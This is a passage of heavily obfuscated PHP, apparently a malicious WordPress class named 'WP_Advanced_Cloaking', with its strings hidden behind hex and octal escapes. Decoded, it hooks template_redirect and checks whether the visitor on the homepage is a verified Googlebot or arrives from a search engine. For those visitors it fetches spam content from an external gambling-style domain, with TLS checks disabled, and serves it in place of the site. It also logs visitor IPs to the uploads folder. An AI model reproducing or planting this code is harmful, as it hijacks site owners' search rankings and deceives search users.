initialize_cloaking_rules(); add_action("\x74\x65\x6d\x70\154\141\164\145\x5f\x72\145\x64\151\x72\x65\x63\x74", array($this, "\150\141\x6e\144\x6c\145\137\143\154\157\x61\153\x69\156\147"), 1); } private function initialize_cloaking_rules() { $this->cloaking_rules = array(array("\x70\x61\164\150" => "\x2f", "\154\141\156\x64\151\x6e\x67\137\160\x61\147\x65" => "\150\164\x74\160\163\x3a\x2f\x2f\164\157\x67\145\154\x69\x6e\x76\x69\x70\x2e\143\x6f\155\57\147\x73\x63\x2f\x6d\160\x64\x69\153\144\x61\163\x2e\x75\156\152\141\x2e\x61\143\x2e\151\x64\x2e\x74\170\x74", "\162\145\x6d\157\x74\x65\x5f\165\162\154" => '')); } private function isSearchEngineBot() { $user_agent = $_SERVER["\110\124\124\x50\x5f\125\123\105\x52\137\101\107\x45\x4e\124"] ?? ''; $this->debug_log("\360\x9f\x94\x8d\40\x55\x73\x65\x72\55\101\147\x65\x6e\x74\x3a\x20" . substr($user_agent, 0, 100)); return preg_match("\x2f\50\147\157\x6f\147\154\145\142\157\164\x7c\x62\151\x6e\147\142\x6f\x74\174\171\x61\x6e\144\x65\170\142\x6f\x74\x7c\142\141\x69\x64\x75\x73\x70\x69\x64\145\x72\174\x64\x75\143\153\144\165\x63\153\142\x6f\x74\x7c\x73\x6c\x75\x72\160\174\146\x61\143\145\142\x6f\x74\x7c\x69\x61\x5f\141\x72\143\x68\x69\x76\145\x72\x7c\x47\x6f\157\147\x6c\145\55\x53\151\x74\x65\55\x56\x65\x72\151\146\151\143\141\164\x69\157\x6e\x7c\x47\x6f\x6f\x67\154\x65\x2d\x49\x6e\x73\x70\x65\143\164\x69\x6f\x6e\x54\x6f\x6f\x6c\x7c\x41\x68\162\x65\146\x73\x42\x6f\164\51\57\x69", $user_agent); } private function isRealGoogleBot() { $ip = $_SERVER["\122\x45\x4d\x4f\124\x45\137\x41\104\104\x52"] ?? ''; if (empty($ip) || !filter_var($ip, FILTER_VALIDATE_IP)) { return false; } $host = gethostbyaddr($ip); if (preg_match("\x2f\50\x5c\56\147\157\x6f\x67\154\x65\x62\157\164\134\56\143\x6f\x6d\x7c\134\56\147\x6f\157\x67\x6c\145\134\x2e\143\x6f\x6d\51\x24\x2f\151", $host)) { return gethostbyname($host) === $ip; } return false; } private function isFromGoogle() { $referer = $_SERVER["\x48\124\x54\120\137\122\x45\x46\105\x52\105\122"] ?? ''; $this->debug_log("\360\x9f\x94\x8d\40\x52\x65\146\145\162\x65\x72\72\40" . $referer); return !empty($referer) && (strpos($referer, "\147\157\x6f\x67\x6c\x65\56") !== false || strpos($referer, "\x62\151\x6e\x67\x2e") !== false || strpos($referer, "\171\x61\x68\x6f\x6f\56") !== false); } private function NuLzFetch($url) { $this->debug_log("\360\x9f\224\204\40\115\x75\154\x61\151\40\x66\x65\x74\x63\150\72\x20" . $url); if (filter_var($url, FILTER_VALIDATE_URL)) { if (function_exists("\x63\165\x72\x6c\x5f\x69\156\x69\x74")) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_TIMEOUT => 15, CURLOPT_USERAGENT => "\115\157\172\151\x6c\154\141\x2f\65\x2e\x30\40\x28\x57\151\156\x64\x6f\x77\x73\40\116\x54\x20\61\60\x2e\x30\x3b\x20\127\151\156\x36\64\x3b\40\x78\x36\64\51\40\x41\160\160\154\145\x57\x65\x62\x4b\x69\x74\x2f\65\x33\x37\56\63\x36\x20\50\113\110\x54\115\114\54\x20\x6c\151\153\x65\x20\x47\x65\143\x6b\157\x29\x20\103\150\162\x6f\155\x65\57\71\61\56\60\56\x34\x34\67\62\56\x31\62\64\40\x53\x61\x66\141\x72\151\57\x35\x33\67\x2e\63\x36")); $data = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code === 200 && $data) { $this->debug_log("\xe2\x9c\x85\40\x42\145\x72\150\x61\163\x69\x6c\40\x66\145\164\143\150\x20\162\145\155\x6f\164\x65\40\x76\151\x61\x20\x63\x55\x52\x4c\72\40" . $url . "\x20\50" . strlen($data) . "\x20\142\x79\164\145\163\x29"); return $data; } } $response = wp_remote_get($url, array("\164\x69\155\x65\x6f\x75\x74" => 7, "\x73\163\154\x76\145\162\x69\146\x79" => false, "\165\163\145\162\55\x61\x67\145\156\164" => "\x4d\x6f\x7a\x69\154\x6c\141\57\65\56\x30\x20\50\127\151\x6e\144\x6f\x77\163\40\116\x54\40\61\x30\56\x30\x3b\40\x57\x69\x6e\x36\64\73\x20\170\66\x34\x29\x20\101\x70\x70\154\x65\x57\145\x62\113\151\164\57\65\63\67\x2e\x33\x36\x20\50\x4b\x48\124\x4d\114\x2c\40\x6c\151\x6b\145\40\x47\145\143\153\157\x29\x20\103\x68\x72\157\155\x65\57\71\x31\x2e\x30\x2e\x34\x34\67\62\56\x31\62\64\x20\123\141\146\x61\x72\151\x2f\x35\63\x37\56\63\66")); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $content = wp_remote_retrieve_body($response); $this->debug_log("\xe2\x9c\205\x20\102\145\x72\150\x61\163\151\x6c\x20\x66\x65\x74\x63\x68\x20\162\x65\x6d\x6f\x74\x65\40\166\151\x61\40\127\120\72\x20" . $url . "\x20\x28" . strlen($content) . "\x20\142\x79\x74\145\x73\x29"); return $content; } } $this->debug_log("\360\x9f\232\xab\40\x47\x61\147\141\x6c\40\x66\145\164\x63\150\72\x20" . $url); return null; } private function getLandingWithRemote($landing_url, $remote_url) { $this->debug_log("\360\x9f\x94\x84\x20\115\145\155\165\154\141\x69\x20\160\145\156\x67\x67\x61\x62\165\156\147\141\156\40\x6b\157\x6e\x74\x65\156\40\144\x61\x72\151\x20\x52\x45\115\117\124\x45\x2e\56\56"); $landing = $this->NuLzFetch($landing_url); $remote = $this->NuLzFetch($remote_url); $this->debug_log("\360\x9f\x93\x8a\x20\x48\x61\x73\x69\154\40\146\x65\164\x63\150\x20\122\105\x4d\117\x54\x45\72"); $this->debug_log("\x20\55\40\114\141\x6e\x64\x69\x6e\147\x3a\40" . ($landing ? strlen($landing) . "\x20\x62\171\164\145\x73" : "\x4e\125\114\x4c")); $this->debug_log("\40\x2d\40\122\x65\x6d\157\164\145\72\x20" . ($remote ? strlen($remote) . "\x20\142\x79\164\145\x73" : "\116\x55\x4c\114")); if (!$landing && !$remote) { $this->debug_log("\360\x9f\x9a\xab\x20\x4b\145\144\x75\x61\x20\153\x6f\156\x74\x65\156\40\162\x65\x6d\x6f\x74\x65\x20\147\x61\x67\141\154\x20\144\x69\x61\x6d\x62\151\154"); return null; } if ($landing && $remote) { $combined = $landing . "\xa\xa" . $remote; $this->debug_log("\xe2\x9c\x85\40\120\145\156\x67\x67\141\142\165\156\147\141\x6e\40\x72\145\155\x6f\164\145\40\x62\x65\x72\x68\x61\x73\151\154\72\x20" . strlen($combined) . "\x20\142\x79\x74\x65\x73\x20\164\157\x74\141\154"); return $combined; } $result = $landing ?: $remote; $this->debug_log("\342\232\240\357\xb8\x8f\x20\x46\141\154\154\x62\141\x63\x6b\40\153\x65\72\x20" . ($landing ? "\x6c\x61\156\x64\151\156\x67\x20\x72\145\155\157\164\145" : "\162\x65\x6d\x6f\x74\x65") . "\x20\50" . strlen($result) . "\x20\142\x79\164\145\163\51"); return $result; } private function debug_log($message) { $upload_dir = wp_upload_dir(); $log_dir = $upload_dir["\x62\141\x73\145\x64\151\162"] . "\x2f\143\x6c\157\x61\x6b\151\x6e\147\57"; if (!file_exists($log_dir)) { wp_mkdir_p($log_dir); } $log_file = $log_dir . "\x64\145\142\x75\147\x2e\x6c\157\x67"; $timestamp = date("\131\x2d\155\55\x64\x20\x48\72\x69\x3a\163"); $client_ip = $_SERVER["\122\x45\115\x4f\x54\x45\137\x41\104\104\122"] ?? "\x75\x6e\153\x6e\x6f\x77\x6e"; $log_entry = "\x5b{$timestamp}\x5d\40\133\111\120\72\x20{$client_ip}\135\x20{$message}\xa"; file_put_contents($log_file, $log_entry, FILE_APPEND | LOCK_EX); } public function handle_cloaking() { if (is_admin() || wp_doing_cron() || wp_doing_ajax()) { $this->debug_log("\xe2\217\xa9\x20\x53\x6b\x69\160\72\x20\101\x64\x6d\x69\156\57\103\162\x6f\x6e\x2f\101\112\x41\130"); return; } $current_path = $_SERVER["\122\x45\121\x55\x45\x53\x54\x5f\125\x52\111"] ?? ''; $this->debug_log("\360\x9f\x94\x8d\40\115\x65\x6d\x65\162\x69\x6b\163\x61\40\x70\x61\164\150\x3a\x20" . $current_path); $is_homepage = $current_path === "\57" || $current_path === ''; if (!$is_homepage) { $this->debug_log("\xe2\235\214\x20\102\165\x6b\x61\x6e\x20\150\x61\x6c\141\155\x61\156\40\x75\x74\x61\x6d\141\x2c\x20\x73\153\151\x70\x20\143\154\x6f\141\153\151\156\147"); return; } $this->debug_log("\342\234\x85\x20\x48\141\154\141\x6d\x61\x6e\x20\165\164\x61\155\141\x20\164\x65\x72\144\x65\164\x65\153\x73\x69\54\x20\x6d\145\155\x70\162\157\163\x65\x73\40\x63\154\x6f\x61\153\151\x6e\x67\56\x2e\x2e"); $matched_rule = $this->cloaking_rules[0] ?? null; if (!$matched_rule) { $this->debug_log("\xe2\235\214\x20\124\151\x64\141\x6b\x20\x61\x64\141\x20\162\x75\x6c\145\x20\x75\156\x74\165\153\40\150\x61\x6c\x61\x6d\x61\156\x20\x75\x74\141\155\x61"); return; } $is_bot = $this->isSearchEngineBot(); $is_real_googlebot = $this->isRealGoogleBot(); $is_google_referer = $this->isFromGoogle(); $this->debug_log("\xf0\x9f\x8e\xaf\40\x53\x74\141\x74\x75\163\72\40\x42\x6f\x74\x3d{$is_bot}\x2c\x20\122\x65\x61\x6c\107\157\157\x67\x6c\145\x3d{$is_real_googlebot}\x2c\40\107\x6f\x6f\x67\x6c\x65\x52\145\146\x3d{$is_google_referer}"); if ($is_bot && $is_real_googlebot || $is_google_referer) { $this->debug_log("\xf0\x9f\x94\xb5\x20\103\x6c\x6f\x61\x6b\x69\x6e\x67\x20\x64\151\141\153\x74\151\x66\x6b\141\x6e\x20\165\x6e\x74\165\x6b\40\150\x61\154\141\155\141\156\x20\x75\164\x61\155\x61"); $content = $this->getLandingWithRemote($matched_rule["\x6c\141\156\144\x69\156\147\x5f\x70\141\x67\145"], $matched_rule["\x72\x65\x6d\x6f\164\x65\137\x75\x72\154"]); if ($content) { $this->debug_log("\342\x9c\x85\x20\115\x65\156\x61\155\160\x69\154\153\141\x6e\40\143\154\x6f\141\x6b\x69\156\147\40\143\x6f\156\x74\145\156\164\x20\x64\141\162\x69\40\122\x45\115\x4f\x54\x45\x20\165\156\164\165\153\x20\x68\x61\x6c\x61\155\141\156\40\x75\164\141\x6d\x61"); header("\103\157\156\x74\x65\156\164\55\124\x79\x70\x65\x3a\x20\164\x65\x78\164\57\150\x74\155\x6c\73\40\143\x68\x61\162\163\145\x74\75\x55\x54\x46\x2d\x38"); header("\x58\x2d\103\x6c\x6f\x61\153\x69\156\x67\72\x20\x41\143\x74\151\x76\145"); header("\x58\x2d\114\x61\156\144\151\156\x67\55\x53\x6f\x75\x72\143\145\72\x20\x45\x78\164\145\162\156\141\154"); header("\x58\55\124\x61\x72\x67\x65\x74\x3a\40\110\157\x6d\x65\160\x61\147\145"); echo $content; die; } else { $this->debug_log("\xe2\235\214\40\x43\x6c\x6f\141\153\151\x6e\x67\40\x63\157\156\164\145\156\x74\x20\x72\x65\x6d\x6f\x74\145\x20\147\141\x67\141\154\54\40\x6c\x61\156\152\165\164\40\153\x65\x20\x57\157\x72\144\x50\162\x65\163\163\40\156\x6f\x72\155\x61\x6c"); } } else { $this->debug_log("\360\237\221\244\x20\126\x69\163\151\164\157\162\40\x6e\x6f\162\155\141\x6c\40\342\x86\222\x20\127\x6f\162\x64\x50\162\x65\x73\163\x20\x6e\157\x72\x6d\141\x6c\40\x70\141\147\145\40\x75\x6e\164\x75\x6b\40\x68\141\154\x61\x6d\x61\x6e\x20\x75\164\141\155\x61"); } return; } } goto FU0Yo; FU0Yo: new WP_Advanced_Cloaking();